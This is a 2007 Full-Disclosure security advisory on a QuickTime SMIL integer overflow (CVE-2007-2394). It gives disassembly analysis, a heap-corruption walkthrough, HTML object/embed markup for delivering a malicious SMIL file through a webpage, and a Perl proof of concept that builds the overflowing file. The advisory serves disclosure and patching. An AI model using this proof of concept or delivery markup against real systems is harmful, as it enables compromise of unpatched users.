Message-ID: <722e995f0709030728u4a63ad59odc56afb28f70328f@mail.gmail.com>
Date: Mon, 3 Sep 2007 16:28:20 +0200
From: "David Vaartjes" <d.vaartjes.nospam@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Apple QuickTime integer overflow vulnerability when parsing SMIL file
======================================================================
Apple QuickTime integer overflow vulnerability when parsing SMIL file
======================================================================
Date: 09/03/2007
Author: David Vaartjes <d.vaartjes at gmail.com>
Identifier: CVE-2007-2394
Revision: 0.2
----------------------------------------------------------------------
AFFECTED VERSIONS
----------------------------------------------------------------------
Researched on QuickTime 7.1.3 running on Windows 2000 SP4.
iDefense confirmed the existence of this vulnerability in version
7.1.3 and 7.1.5 for Windows XP SP2 and Mac OS X also [1]. As QuickTime
binaries for Windows XP and Vista are identical, this issue will
affect QuickTime running on Windows Vista also.
----------------------------------------------------------------------
FIXED VERSIONS
----------------------------------------------------------------------
Apple has released QuickTime version 7.2 for Mac OS X v10.3.9, Mac OS
X v10.4.9 or later, Windows Vista and Windows XP SP2 to address this
issue. See [2] for additional information about this update.
QuickTime 7.2 is not available for the Windows 2000 platform.
Presumably, Apple dropped support for this platform.
----------------------------------------------------------------------
PRODUCT DESCRIPTION
----------------------------------------------------------------------
QuickTime is Apple's media player product. According to Apple,
QuickTime is downloaded over 10 million times a month. According to
Secunia, QuickTime is currently installed on over 50% of PCs [3].
The Synchronized Multimedia Integration Language (SMIL) provides a
high-level scripting syntax for describing multimedia presentations.
SMIL files are text files that use XML-based syntax to specify what
media elements to present and where and when to present them.
----------------------------------------------------------------------
VULNERABILITY DESCRIPTION
----------------------------------------------------------------------
An integer overflow vulnerability exists in a part of QuickTime.qts
that calculates the size of a buffer that stores the title and author
fields of a SMIL file. This can be exploited to overflow that heap
buffer with user supplied content, which eventually can result in the
execution of arbitrary code.
----------------------------------------------------------------------
VULNERABILITY DETAILS
----------------------------------------------------------------------
The integer overflow can be triggered by creating a SMIL file
containing a title and author field of a specific length.
--
<smil>
<head>
<meta name="title" content="specific-length"/>
<meta name="author" content="specific-length"/>
</head>
</smil>
--
When such a SMIL file is parsed, the length value of the author field
is stored in a short int data type (16 bit) without bounds checking.
In sub_66952B50(), this value is sign extended to a long int data
type (32 bit).
--
66952C9A push eax
66952C9B call sub_668B57D0
66952CA0 --> movsx eax, word ptr [esp+2Ch+var_C]
66952CA5 mov edx, [esp+2Ch+arg_4]
66952CA9 lea ecx, [esp+2Ch+var_10]
--
So, when the length of the author field is >= 0x8000 bytes, it will be
extended to a length value between 0xffff8000 and 0xffffffff.
Next, in sub_668DCFD0() the sign extended length of the author field
is added to the length of the title field + 0x20:
--
668DD04D jnz short loc_668DD0A0
668DD04F test ebx, ebx
668DD051 jz loc_668DD1EB
668DD057 --> lea eax, [edi+ebx] // edi holds the length of
// the title field + 0x20.
// ebx holds the sign
// extended length of the
// author field.
668DD05A push eax
668DD05B push ecx
--
In sub_668DCA60(), 4 is added to the result of the calculation:
--
668DCB37 test edi, edi
668DCB39 jz short loc_668DCB40
668DCB3B --> lea eax, [edi+4] // edi holds the result
668DCB3E jmp short loc_668DCB42
--
Next, in sub_668F5550() the final length value is used as the dwBytes
argument in a call to HeapReAlloc():
--
668F555E push eax // dwBytes (user specified)
668F555F push ecx // lpMem
668F5560 push 1 // dwFlags
668F5562 push edx // hHeap
668F5563 --> call ds:HeapReAlloc
--
This allows for the allocation of a controlled amount of memory. For
example, when setting the length of the author field to 0xff00 (65280)
and the length of the title field to 0xdf (223), the following
situation occurs:
1: sub_66952B50():
0x0000ff00 will be sign extended to 0xffffff00.
2: sub_668DCFD0():
0x000000ff (0x000000df + 0x00000020) will be added to 0xffffff00
resulting in a length value of 0xffffffff.
3: sub_668DCA60():
0x00000004 is added to 0xffffffff, resulting in a value of 0x00000003.
4: sub_668F5550():
HeapReAlloc() will allocate 0x00000003 bytes of memory.
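To make the arithmetic above concrete, the following is an added C model (not QuickTime's code, and the function names are assumptions for illustration) of the vulnerable size computation beside a checked version that zero extends the 16-bit length and rejects any addition that wraps before the size reaches the allocator.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed model of the size calculation described in the advisory;
 * this is not QuickTime's code. author_len is the 16-bit length of the
 * author field, title_len the length of the title field. */

/* Vulnerable path: the 16-bit author length is sign extended (movsx),
 * added to title_len + 0x20, then 4 is added, with no overflow checks. */
uint32_t vulnerable_alloc_size(uint16_t author_len, uint32_t title_len)
{
    int32_t ext = (int32_t)(int16_t)author_len;   /* >= 0x8000 becomes negative */
    uint32_t sum = (uint32_t)ext + (title_len + 0x20);
    return sum + 4;                                /* wraps to a tiny size */
}

/* Hardened version (an assumed fix, not Apple's patch): zero extend the
 * 16-bit length and check each addition for wrap-around. Returns 0 when
 * the size would overflow; 0 is never a valid result because of the +4. */
uint32_t checked_alloc_size(uint16_t author_len, uint32_t title_len)
{
    uint32_t ext = (uint32_t)author_len;           /* movzx semantics */
    uint32_t size;
    if (title_len > UINT32_MAX - 0x20) return 0;
    size = title_len + 0x20;
    if (size > UINT32_MAX - ext) return 0;
    size += ext;
    if (size > UINT32_MAX - 4) return 0;
    return size + 4;
}

int main(void)
{
    /* The advisory's values: author 0xff00 (65280), title 0xdf (223). */
    printf("vulnerable size: 0x%08x\n", (unsigned)vulnerable_alloc_size(0xff00, 0xdf));
    printf("checked size:    0x%08x\n", (unsigned)checked_alloc_size(0xff00, 0xdf));
    return 0;
}
```

With the advisory's lengths the vulnerable path yields 3 bytes while the checked path yields 0x10003, which is the author data plus title data plus the 0x24 bytes of overhead.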
Next, the pointer returned by HeapReAlloc() is used by sub_668DCFD0()
as the dest argument in a call to memcpy():
--
668DD08E push ebx // count, length value right
// after sign extension
// (0xffffff00).
668DD08F push edx // src, buffer with user
// supplied (author) content.
668DD090 add eax, esi
668DD092 --> push eax // dest, 3 byte buffer.
668DD093 call _memcpy
668DD098 add esp, 18h
668DD09B jmp loc_668DD1E5
--
This copy action will result in an overflow of the 3 byte heap
buffer with data from the author field (user supplied). Due to the
large amount of data written, this will finally result in an access
violation when memory is read or written outside the heap page. The
exception is handled by the program and execution continues with a
corrupt heap.
For my platform (win2k), when a call to HeapAlloc() is executed the
unlink code of ntdll will "fail" because we have overwritten pointers
in the heap management structures of other heap buffers with our data.
The status of the registers during unlinking is:
--
EAX 78787878 <-- user supplied
ECX 78787878 <-- user supplied
EDX 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"
EBX 00000078
ESP 0012EDC8
EBP 0012EF84
ESI 01200000
EDI 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"
--
--
77f867e6 mov dword ptr ds:[ecx],eax
77f867e8 mov dword ptr ds:[eax+4],ecx
--
The unlink instructions will result in the following exception:
---------------------------
QuickTimePlayerMain: QuickTimePlayer.exe
"The instruction at "0x77f867e6" referenced memory at "0x78787878".
The memory could not be "written"
---------------------------
This shows that we are able to overwrite 4 bytes anywhere in the
address space of the process with "any" 4 byte value we want, which
can for example be exploited to overwrite function pointers like the
SEH or UEF to gain control of the process. This 4 byte overwrite via
the unlink code does not apply to XPSP2 and W2K3 as "safe unlinking"
is used on these platforms.
----------------------------------------------------------------------
ATTACK VECTORS
----------------------------------------------------------------------
This vulnerability can be triggered by luring a target user into
running a malicious SMIL file locally or via a webpage. In the latter
scenario the OBJECT (IE) and/or EMBED (Firefox) tags can be used:
<OBJECT
  CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
  CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab"
  WIDTH="10" HEIGHT="10" >
  <!-- malicious SMIL file -->
  <PARAM NAME="src" VALUE="poc.smil" />
  <!-- SRC: available .qtif or .mov file to start up QT for Firefox;
       QTSRC: malicious SMIL file -->
  <EMBED
    SRC="available-sample.qtif"
    QTSRC="poc.smil"
    WIDTH="10" HEIGHT="10"
    PLUGINSPAGE="www.apple.com/quicktime/download"
    TYPE="video/quicktime"
  />
</OBJECT>
----------------------------------------------------------------------
PROOF OF CONCEPT
----------------------------------------------------------------------
#!/usr/bin/perl -w
####
# QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC
#
# Researched on QuickTime 7.1.3 on Windows 2000 SP4.
#
# David Vaartjes <d.vaartjes at gmail.com>
####
use strict;

my $file    = "poc.smil";
my $padd    = "x";
my $cop_len = 36;
####
# By choosing the following lengths the
# integer overflow will be triggered.
####
my $tit_len  = 223;
my $auth_len = 65280;

open(my $fh, ">", $file) or die "Can't open file: $!";
print $fh
"<smil>\n".
"<head>\n".
" <meta name=\"title\" content=\"".($padd x $tit_len)."\"/>\n".
" <meta name=\"author\" content=\"".($padd x $auth_len)."\"/>\n".
" <meta name=\"copyright\" content=\"".($padd x $cop_len)."\"/>\n".
"</head>\n".
"</smil>";
close($fh);
----------------------------------------------------------------------
REFERENCES
----------------------------------------------------------------------
[1] http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
[2] http://docs.info.apple.com/article.html?artnum=305947
[3] http://secunia.com/blog/7/
----------------------------------------------------------------------
DISCLOSURE TIMELINE
----------------------------------------------------------------------
04/02/2007 Initial vendor notification (by iDefense)
04/09/2007 Initial vendor response
07/11/2007 Apple security bulletin & patches available
07/11/2007 Public disclosure of iDefense advisory
09/03/2007 Public disclosure of this advisory
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/